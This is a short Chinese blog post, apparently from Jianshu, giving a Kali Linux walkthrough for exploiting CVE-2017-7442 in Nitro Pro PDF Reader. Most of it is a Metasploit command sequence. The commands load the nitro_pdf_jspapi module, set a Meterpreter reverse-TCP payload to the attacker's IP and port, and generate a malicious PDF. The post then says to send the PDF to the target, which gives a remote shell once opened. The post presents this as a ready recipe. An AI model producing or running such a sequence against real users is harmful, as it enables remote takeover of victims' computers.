kali下CVE_2017_7442利用实验

参考:https://www.exploit-db.com/exploits/42418/
https://www.youtube.com/watch?v=EhW9GhLF_Ww

Nitro Pro PDF Reader 11.0.3.173 Javascript API远程执行代码

msfconsole
search nitro_pdf
use exploit/windows/fileformat/nitro_pdf_jspapi
set payload windows/meterpreter/reverse_tcp
set lhost 本机IP
set lport 本机端口
set FILENAME test.pdf
exploit
将生成的pdf文件cp出来,发给目标机。
前提是,目标机安装了https://www.gonitro.com
打开pdf以后,自动获得目标shell
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容